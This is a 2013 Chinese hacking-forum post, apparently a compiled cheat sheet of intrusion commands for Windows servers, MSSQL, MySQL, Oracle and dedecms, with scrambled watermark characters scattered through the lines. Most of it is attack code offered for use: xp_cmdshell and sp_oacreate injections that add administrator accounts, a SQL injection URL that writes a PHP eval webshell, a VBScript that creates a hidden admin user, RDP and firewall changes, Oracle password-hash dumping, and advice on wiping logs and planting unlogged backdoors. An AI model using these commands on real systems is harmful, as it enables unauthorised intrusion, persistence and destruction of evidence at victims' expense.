找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4869|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ v: Q. e* y5 H; w* Z% x1.net user administrator /passwordreq:no
5 c$ d0 v4 \! _7 {这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 y7 ^# F; I3 L( D: q2.比较巧妙的建克隆号的步骤
0 H. ^; {; h3 N先建一个user的用户$ W! R7 H% L( y6 F; w
然后导出注册表。然后在计算机管理里删掉
0 ~  j8 F& w# b1 S: z/ y在导入,在添加为管理员组" q! h: I, i, ~$ o1 J5 |
3.查radmin密码2 ~6 Z6 |# m! B0 i! I: s6 G
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg. R, x/ s3 ~. f8 ]0 r
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
+ z( N5 C. P( g6 C; f建立一个"services.exe"的项
2 a- u! p0 T' `+ [# f再在其下面建立(字符串值)  u6 z$ v9 D5 V+ j
键值为mu ma的全路径1 B' [1 h9 w0 H  i+ y
5.runas /user:guest cmd5 Q! F8 e7 }3 v) l  n
测试用户权限!
9 K1 @, ~; j# F" o4 a6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
: d- p1 `) N4 n9 I7 [7.入侵后漏洞修补、痕迹清理,后门置放:
/ V: a: s/ r+ r1 W- B& [基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门/ y" S2 \/ W0 a" K9 d8 u
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c2 b% L1 |' O; t& o) F( I$ m1 P

- P6 l. Q( ?( `& d# k+ Ifor example+ s: d9 o+ g' B9 |4 s
5 m# O9 F- f$ j! x1 O% E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
3 _# f9 u# J9 K- b/ ~6 d1 Z9 b5 x; G/ R3 r/ C+ b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'4 `* u4 b% F  w7 |+ a; Q, X
+ Z7 i: O6 d+ O7 h% N! z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了* v; B$ L; U4 M1 z# o9 A- g
如果要启用的话就必须把他加到高级用户模式
2 s# x% |4 K5 c: M, V+ e3 ?4 f可以直接在注入点那里直接注入9 e' `7 J7 U, y
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
' i8 w& ^; R$ h$ ]7 Y9 J然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--# N& b' t7 g% ]8 m; i! G9 u  k
或者
! O( x+ ?6 A+ G) s+ h: nsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'  Y0 \# y! D) x! ?1 p
来恢复cmdshell。
/ k1 `! Q6 k, }6 y2 [3 b) r# c8 T
- O! @; e4 W' d7 l分析器
; r; ^6 F, V5 m" k# xEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--' E* @# Z6 E% s  M  |; \  n
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ ~  H5 e1 C/ D10.xp_cmdshell新的恢复办法
6 [' G6 D& w# l8 O7 Pxp_cmdshell新的恢复办法
% ~7 i$ q0 T+ g2 f2 q5 a扩展储存过程被删除以后可以有很简单的办法恢复:" ]% \/ |9 q6 d. O* Z2 ^3 n1 _; d
删除. D2 J0 j$ {. m! A; B
drop procedure sp_addextendedproc
* |& f1 v3 c! ^/ Cdrop procedure sp_oacreate, x& S  U: j( h; H, |$ O
exec sp_dropextendedproc 'xp_cmdshell'
+ S5 F2 B, A8 [. C& j: P
' h; R: k  A( f- L6 g恢复+ v. a' Y  m+ h0 w; d$ G( ]
dbcc addextendedproc ("sp_oacreate","odsole70.dll")) R+ f2 L# d! v0 J- Q
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")" E: z5 K$ ~3 R0 l& V& \

& @" Q5 t* A- B3 t% H/ Q- P: ?这样可以直接恢复,不用去管sp_addextendedproc是不是存在8 C, ?4 [2 b. L& @

9 m+ {, a7 C  G! c- s& Y2 Z-----------------------------& ~6 M$ u  P" w3 t% P5 J

) X& B: _0 l$ H9 t删除扩展存储过过程xp_cmdshell的语句:
& C3 _: b5 v# \  f: s) {" mexec sp_dropextendedproc 'xp_cmdshell', r& Q- N! `3 _* z  t( O! Q, O& O) b

# K9 s) b% `6 `$ w恢复cmdshell的sql语句- s. V5 E6 v2 Z! |9 e
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 p/ J; y- Y. g! O2 ?* w) i' t' y
1 n, p% |/ J& [+ A" M! f% e
开启cmdshell的sql语句: N, l8 D; J: l% z. y

/ q2 @7 {, v. R0 yexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- P, i& D2 r5 F# ~: p2 q, d( Y2 g
3 m& k( f* Q* b1 E% d" s/ F
判断存储扩展是否存在6 `2 O* L% i- B! g3 |0 ~' G) Q* P
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
+ d& X% L, J+ G6 P$ ]2 `9 U返回结果为1就ok
+ \- S2 w9 }% |( B4 r' h! E4 ~% K. [3 {6 n
恢复xp_cmdshell- B. [% M; C* F
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'/ M- K* _1 B# P1 ~
返回结果为1就ok0 j' I" ?7 t' h. \( j

5 D( Y: X& j4 B7 i7 f  `否则上传xplog7.0.dll3 N- y9 |! A5 ]# u  E6 Y' V; s
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'! {! d0 s6 T8 d* `; g, v* n, |/ B
2 `0 I$ ^3 t9 \3 V5 [
堵上cmdshell的sql语句- f$ \4 c( K$ r' U7 f- U" Q
sp_dropextendedproc "xp_cmdshel
$ [, X8 Q& \" N3 j0 G- U-------------------------  @0 [/ h! t, W! Q
清除3389的登录记录用一条系统自带的命令:# B# ^! Y4 k# Z) C" v3 Z
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f5 \1 G, n- o, d& t2 h' M
9 B/ v1 `; X. `* }3 R" m/ X
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
. B9 `$ t$ K( a, R2 z6 e3 s% t在 mysql里查看当前用户的权限
- P5 o0 {% J& Hshow grants for  2 W, C1 U" V8 t8 h
3 G) i9 G% m" K8 c/ K1 T' `
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。, G& b- e8 \% u8 {& [$ s) P

% ]5 {- U, Y3 l) R* |: `% g0 Q$ U& [2 ?3 s/ S
Create USER 'itpro'@'%' IDENTIFIED BY '123';/ F" z( J8 U* d" |" h0 I

" m. |: c$ j; n7 EGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION9 a, u6 \' C5 v" H& b8 F
4 t: V8 T- Q6 a1 K# x
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
0 s0 R- _8 E' E7 N) I* F. c8 E) {; Q* }/ J6 w" d
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;7 m' d! E+ `/ H1 L

' n3 p8 Y7 }$ Y2 W搞完事记得删除脚印哟。
$ }' P! g0 \$ b( [) c  n9 ?/ T+ w0 u/ }. T: ]3 ?& }
Drop USER 'itpro'@'%';
. C' _6 s2 W) u" q% F( l4 x  g
8 e$ D9 l# q, Z$ Y6 zDrop DATABASE IF EXISTS `itpro` ;
9 C% {) r8 z* A1 f+ m8 o" }& p) M2 E& Y- x. g, {0 r9 e6 q
当前用户获取system权限( A6 R6 g1 V* Q9 q; d6 Y# k. e6 j
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact( {% M  h! l  S, g9 c
sc start SuperCMD, V5 x$ M6 [0 W( `" k7 O
程序代码2 y% d2 m  ~& r! G
<SCRIPT LANGUAGE="VBScript">' v( {" d# j7 j% D8 T0 C+ c0 L
set wsnetwork=CreateObject("WSCRIPT.NETWORK"): s! Z5 c/ K3 q
os="WinNT://"&wsnetwork.ComputerName
! Z2 @% Q+ u- d! @' L8 N% |Set ob=GetObject(os)# l7 H7 h. f/ L; h1 u
Set oe=GetObject(os&"/Administrators,group")
+ j. i, O( k. g! i* OSet od=ob.Create("user","nosec")3 ~0 ^% U& j9 Y2 h
od.SetPassword "123456abc!@#"
/ ~4 r; q/ ]2 yod.SetInfo' Z+ B% q% B) M/ ^/ l- H& a
Set of=GetObject(os&"/nosec",user), t* o4 V9 D( V  W. o& l5 {3 c
oe.add os&"/nosec"1 Y2 m! w+ y4 g- n
</Script>
9 Y. ^4 W# k. X& \% d. A<script language=javascript>window.close();</script>
$ H5 q, d" Q+ N" q
/ A* j' F8 Z+ D4 |. A  P- _
) q: r1 {! C- R- t% J5 G
0 f& \$ k$ ^- B: ^' C' k  F2 F) ]' I; q0 ?" `
突破验证码限制入后台拿shell9 X3 ^" W+ m1 W1 \
程序代码, W; ]4 N; ?& E, x2 b7 A8 G2 q9 ]
REGEDIT4 3 Y( O1 Z. T- ?
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 0 H/ D& B* K6 C, _2 L( x" p
"BlockXBM"=dword:00000000
1 F; f& l' R: w2 Z; e1 C4 B
( |- w5 R+ i: e' i# m$ M4 U' m. ?7 H保存为code.reg,导入注册表,重器IE
6 N% N" f/ B4 N就可以了
9 ^) G, K" A% L* q/ i! E+ Gunion写马
& u! h# k  G2 n程序代码7 b3 O2 E2 ]( w, q0 W4 F; [9 ^! U0 f
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" Y3 y0 X; }( r

+ ]' O) j4 l9 ^# V3 H应用在dedecms注射漏洞上,无后台写马
% z4 j3 s* R6 ddedecms后台,无文件管理器,没有outfile权限的时候! ]! P( w4 ^) d4 k( i
在插件管理-病毒扫描里7 l* p( x2 t, c7 {
写一句话进include/config_hand.php里
( d: ~8 x6 F4 Z9 i$ J7 p% D' g程序代码+ G6 P. S" h  q2 ^7 C/ @+ g4 s
>';?><?php @eval($_POST[cmd]);?>& f0 R8 u* U7 w) ^+ b; {( g2 Q

8 j- @2 ~% h2 |2 D  Y* N
( O6 C. W4 O  S8 E+ a如上格式6 y9 I# T- C+ a  _4 p2 a
4 S! h$ M" [5 U' L7 w
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解4 G' n) d  U) d5 B+ f$ |5 A
程序代码
* `2 H* S; }' y7 P6 kselect username,password from dba_users;7 T7 A! [. K6 x! J! C8 Y6 e/ X" T
9 a6 L1 K, y/ N

! B9 C0 ]- K4 X( `! zmysql远程连接用户
# m  z9 i0 m( O+ A9 \程序代码$ g& k! x) [- E$ T+ @3 K; D4 u

: D$ ~+ ^0 W, q; |Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';9 c; f- L+ f# R4 q. p( ~
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION2 o1 c+ ?& M3 ?( a1 B7 r
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
% x& g2 Y+ h! h2 gMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;7 b& U! o4 n2 u/ s( D. U& L
1 w2 H+ D/ P( z. k9 v0 l) K, ]1 f

# u# q6 l8 C0 m2 [7 t1 y; ~& c/ W( t: a
& ?- y6 p3 U" G  n/ c, A
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
$ A1 Y' L6 i- u6 [; m1 R/ I8 V6 P% \6 C! A9 O* J
1.查询终端端口
8 R, [( Y8 H5 J- U, x+ g
9 Q; w! ?# D2 g/ Y( `3 H( ixp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber1 t. V* C0 ^' m

. z  J0 ^9 {. a9 b5 V+ l. A6 X1 r4 C通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"5 v! h- _+ X  m$ u& y+ @
type tsp.reg3 `* u0 W4 [7 a& E2 t1 Z* ^- C4 J
$ X* _9 B5 W$ f0 d4 F  [$ @
2.开启XP&2003终端服务
/ w& U! a% S* i' J% q" F2 c! f' ~6 o
7 t7 y/ j# S- W+ |8 `) l' s
+ B' |8 F7 f% e( CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f; n+ ]9 R2 \: N, s

; P3 {- E- A8 p, ]4 L4 k* r  d4 B, D! D$ d
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f1 b" z) D5 E; t' Q/ ^

8 `6 I- f* l( f3.更改终端端口为20008(0x4E28)& z7 u; S3 h) ^# K
" }  c4 p5 b$ p8 R1 j! G# B: N
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f3 w, `3 H7 D) a$ a0 q* U. D8 O0 O
2 G' J3 C; K8 }& O9 k, Y" q# y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: S7 l( S9 M; [3 y' }# o+ E: ^# j8 C; \  @8 \4 o* \6 I& H' k, Y) W
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制" X" t8 G. F/ B. F3 h: @

  h1 G; r2 S% b5 WREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
0 M/ \: b% d4 k! i5 E
' \4 V) P; \5 y" c
# |4 F, @: v0 C/ y' e5.开启Win2000的终端,端口为3389(需重启)
3 m2 _, O5 c# }
6 h# Z! |( K% `echo Windows Registry Editor Version 5.00 >2000.reg
  M- k+ c! Z0 ]( I4 }echo. >>2000.reg
1 @1 ^  g) L9 T: zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
* U- k. e+ b! c- ~1 \echo "Enabled"="0" >>2000.reg 9 |8 Q1 _) K  Y) i7 q& G$ e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
0 C0 Q8 w' V$ |echo "ShutdownWithoutLogon"="0" >>2000.reg
: d2 V5 f9 p; f3 X4 }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
" Q4 R$ T: W% k, P) Z- z+ Mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
! f* _$ c- k, `" @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
* g8 u4 p8 \# s1 S& Hecho "TSEnabled"=dword:00000001 >>2000.reg
" P6 H/ j: w6 M) a! {; Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg + ]8 ]' j+ w9 W8 m+ P
echo "Start"=dword:00000002 >>2000.reg
8 G1 `% p$ N5 M7 ^3 J5 M3 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
, }9 D6 {) @) R& y7 O- G* Wecho "Start"=dword:00000002 >>2000.reg
* l9 T" V# _% i9 E4 U# K0 M' Secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg   g; \: {2 T; n, C
echo "Hotkey"="1" >>2000.reg
/ T  O, J8 P$ a1 V) Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg   H2 G) K4 C5 T! Q+ z$ H( y, y0 Q: x
echo "ortNumber"=dword:00000D3D >>2000.reg
- Q0 f, D- w6 W8 z" M* Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg $ j" ^: E6 c; ~. `# m' ^
echo "ortNumber"=dword:00000D3D >>2000.reg; A, a& d. |. L6 L+ G
; x( _9 Y" j" s7 U/ K$ d6 w' p1 I
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 C4 ~0 U$ r7 i; m
( `$ r8 f! j: S9 U1 T@ECHO OFF & cd/d %temp% & echo [version] > restart.inf7 I, F# s1 T& K$ ]+ [9 z
(set inf=InstallHinfSection DefaultInstall)
0 u6 g5 v4 @$ @6 decho signature=$chicago$ >> restart.inf, f% ^, t2 b4 u2 G3 Z
echo [defaultinstall] >> restart.inf
% `4 R/ ]; h7 Y/ v1 R" e4 |rundll32 setupapi,%inf% 1 %temp%\restart.inf. f2 u4 ]0 ^6 x1 M. g5 N
9 ^8 g) Z" H. ]/ `

- M9 l) Y8 f" O4 @7.禁用TCP/IP端口筛选 (需重启); V2 R" g9 v6 E# j

' I& C! I4 |9 J8 }2 [4 O( QREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
9 T$ e7 a! d$ F' W; o5 ]9 W. T& x' e/ ~* T! n
8.终端超出最大连接数时可用下面的命令来连接
" `2 [- G* v2 f0 S' x! O3 ~$ g1 V  D- p. c# @
mstsc /v:ip:3389 /console1 N" w& F# a2 p3 g& U

/ {: X2 ?. O6 A# a. h9.调整NTFS分区权限
( w4 H7 g9 v! A9 E( A) F/ b8 j1 e& R% X. H" H
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)& k. Q9 c! T; w$ K, n" I4 w9 m

& x& ~8 P7 G$ b- E2 Mcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)2 _/ L" m: ]" K% O% `: C

4 o- P0 K3 d  i# S$ P2 [------------------------------------------------------! j0 Q9 j" E8 v, l
3389.vbs
( |' y' r* p& y5 P& MOn Error Resume Next
4 S8 u+ n  L4 U7 b" l) Econst HKEY_LOCAL_MACHINE = &H80000002
$ {# S8 `; L, M2 GstrComputer = "."
4 F. Q3 [5 ~4 p4 }Set StdOut = WScript.StdOut
  T: X3 P6 M9 a2 V7 ]6 K9 C- @Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_) T& s( ^/ g8 y* J$ g
strComputer & "\root\default:StdRegProv")
* Y: r3 v/ r0 Z. @7 {! o$ e7 [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ Z: c2 ^9 a- ?  r9 V
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath% b2 L% P1 ^# w! m0 J8 W' Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
5 \% \3 q; H1 Q& y( doreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
: {# V, ?% P* D$ ]# q+ ~strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"9 V2 d3 E- f8 k) g$ U. ?
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
  ?/ M' s5 D! Q( {strValueName = "fDenyTSConnections"
. O2 d9 R& P, rdwValue = 0
8 `- S4 P5 Y5 g9 k* c: a% }oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 w5 t3 m, O& `# ?! v6 N/ J6 A) M+ v
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 l# G/ m0 O, d. B' c, EstrValueName = "ortNumber"
0 c3 k3 o- p' e( P& TdwValue = 3389
  i. _+ _3 {# R/ h( M/ O9 i& H) R6 Moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 ]+ `$ V! z3 d2 j6 q- HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
+ Y1 X' b; H( F  i, }strValueName = "ortNumber"; R# ]6 l; P# F6 o  k9 }
dwValue = 33898 u! M0 D/ Y3 _# w( Y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
( x( s  x# J- h4 S* `2 ASet R = CreateObject("WScript.Shell")
" b5 g; B1 o: a/ c+ t. \6 ~7 RR.run("Shutdown.exe -f -r -t 0")
& a5 R+ _3 M! E
7 U1 r( I% L: K' ^/ M3 J  Y* g删除awgina.dll的注册表键值
' }8 W+ N7 D; m9 k程序代码
9 C2 u/ B) z, X4 Q) H
5 `* y% g  ^7 ?' M8 ureg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f) x* L+ F) P) F  W8 ?0 \
6 U4 p$ {9 U- f- B, y: O
/ G7 Q1 K% F& e1 Y* u

; S, O7 k' n. U: K$ L8 ^: |% v6 x2 i4 C9 r% }" N, E; t: `
程序代码
( H# ~$ ?8 y. b8 V( hHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash+ z% ~2 j/ U! o) e7 h/ f8 _! j

2 n$ @; A- ^; L3 U设置为1,关闭LM Hash5 ^3 Z, V. l0 l( ^/ r

7 q. ~- b, a6 R2 v: u) u数据库安全:入侵Oracle数据库常用操作命令
+ o) J7 d" f9 p: @( ~5 J' V9 {最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
: r) }6 }9 x) E1 D1 M& H7 ^5 o1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
6 B) [) ^* a, M/ G- f( g$ _2 W2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
7 E2 l- {! n8 R) w5 A  `3、SQL>connect / as sysdba ;(as sysoper)或8 p1 K1 r7 V- v' q5 l. w; T
connect internal/oracle AS SYSDBA ;(scott/tiger)# i+ h: o6 G7 E
conn sys/change_on_install as sysdba;
+ e! s) c0 R. S8 m6 t) ~$ p4、SQL>startup; 启动数据库实例" M/ |0 W# P7 c( U/ y5 @6 |0 K
5、查看当前的所有数据库: select * from v$database;
6 |% G( R% i- Y$ mselect name from v$database;7 D% R8 {/ J$ O' Y6 {+ u
6、desc v$databases; 查看数据库结构字段
) r3 U, Y- `9 u8 n- y7 {# P! G7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 L) `, Z" M4 I+ o  p# f/ h- RSQL>select * from V_$PWFILE_USERS;
' J/ @5 c' v$ PShow user;查看当前数据库连接用户4 P" `" _1 x, w2 v1 u
8、进入test数据库:database test;
5 y' x7 _! j( X' S9、查看所有的数据库实例:select * from v$instance;8 h1 u8 g8 C8 F" e2 ^+ Q% G9 ^% v
如:ora9i
) R: j1 g. V" H2 O' n10、查看当前库的所有数据表:
* g4 v# g! j) k4 {SQL> select TABLE_NAME from all_tables;# a; Y; Y2 S7 p% x3 d& d- x" L
select * from all_tables;
" V/ H* E( x3 {" E3 [/ w+ \+ _SQL> select table_name from all_tables where table_name like '%u%';
) k% f  Q; S# sTABLE_NAME
0 [4 s, ?9 S" f0 e  ]------------------------------
) J; y. K4 S+ {. l( Q6 G1 e4 N_default_auditing_options_
: e, A! B7 r" a% X7 J. H11、查看表结构:desc all_tables;. d# o) w0 z- ?( Y, @* V3 U( j/ ?
12、显示CQI.T_BBS_XUSER的所有字段结构:) O. [5 ]9 n! K6 J$ \8 e
desc CQI.T_BBS_XUSER;
% ?0 i6 B! {2 V. j0 c( b# A3 y7 f13、获得CQI.T_BBS_XUSER表中的记录:4 S! z/ e' @) j  @! u7 S, ^& D
select * from CQI.T_BBS_XUSER;
8 {  T  v2 s- {5 E7 o14、增加数据库用户:(test11/test)
; L8 H! x" S" Rcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;+ _" V) b. d6 g% G3 n
15、用户授权:' c- h* k$ X8 C2 x& D, ^# w4 e
grant connect,resource,dba to test11;, V9 w2 j) ^: ?" v/ k2 t: ?
grant sysdba to test11;
- k! ]! w4 l+ z  a) Ucommit;
5 w0 X0 w4 g; K0 x. W+ {16、更改数据库用户的密码:(将sys与system的密码改为test.)" e; k& Q! A+ r9 _9 C, a5 y
alter user sys indentified by test;
& D. {5 {# k' m& x' Ualter user system indentified by test;: M; n. q% ^  e

5 z; x0 g1 ?% Y% y/ @applicationContext-util.xml6 \: A* z: K7 b4 t& ^6 _- B
applicationContext.xml
" [$ b; [/ ~  ?" k( Ystruts-config.xml& W: j9 \3 ~' V: |7 P
web.xml
, N; Z6 V1 K+ jserver.xml3 @" f5 K* q& F. L
tomcat-users.xml( V( L! F  w1 U
hibernate.cfg.xml& n: i3 f8 g+ m/ }- Z4 |
database_pool_config.xml6 _1 o" w, l" t( H# ]( r
. J) J. x5 i" R* }% z6 {- g  ~7 i1 u

) m* [6 p: z, @\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置. s  q. ~- g! N5 h+ c7 E
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini$ d9 f; D" z- j) w
\WEB-INF\struts-config.xml  文件目录结构
: I' ]5 f" ~& G5 m
5 r) C: `8 L' yspring.properties 里边包含hibernate.cfg.xml的名称$ t7 c: X5 b/ l

% f% X) v0 r) Y0 Z: ~0 x3 H7 G  C( D7 v) O) O
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 ^% ~  D5 P' f4 |/ b7 w2 B

& f1 I) F" q3 E2 e3 E& f( e如果都找不到  那就看看class文件吧。。% X! a3 Z$ N6 o' h' Q7 f
/ f6 h" V: b( W$ f' L# x8 K
测试1:, X3 e. }# o+ b* B$ K
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
3 \& g* I. y& F8 ?5 Q% d2 Y  }; ?! E% ?3 W8 ?$ `
测试2:0 K* {1 S7 _" _: \. t- y9 B0 ?

" U4 O. O" C8 ^) G! c1 s$ lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
8 u/ G/ |8 [( m9 O
1 t& `: M/ h, x; o0 s& rdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--6 Q( x* V4 y4 l% ~6 i. n
9 I  {9 U8 x& B2 S
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
+ U8 d- Z2 N* G9 g5 w6 G( ?8 k+ v# o) ~. b7 y5 w2 |* A1 [" R& b" k( p1 X1 A
查看虚拟机中的共享文件:
( J- k" |' C) q. u  {9 f在虚拟机中的cmd中执行
  D' k5 a* l* s* V& ]1 d. v4 e\\.host\Shared Folders1 e% P" n  S1 N/ [; M8 k3 z3 E

  z* C" x3 R) Y, h5 S; ~cmdshell下找终端的技巧+ p' G' U4 B0 D
找终端: - ?/ g/ M3 g8 ]
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 R4 _1 @- w5 Z- G; ]5 y   而终端所对应的服务名为:TermService
! u. i4 Y+ \5 q/ y) O7 E1 r2 s第二步:用netstat -ano命令,列出所有端口对应的PID值!
- a- w1 i1 l  b5 X, {   找到PID值所对应的端口+ S2 `* B+ M! D, t

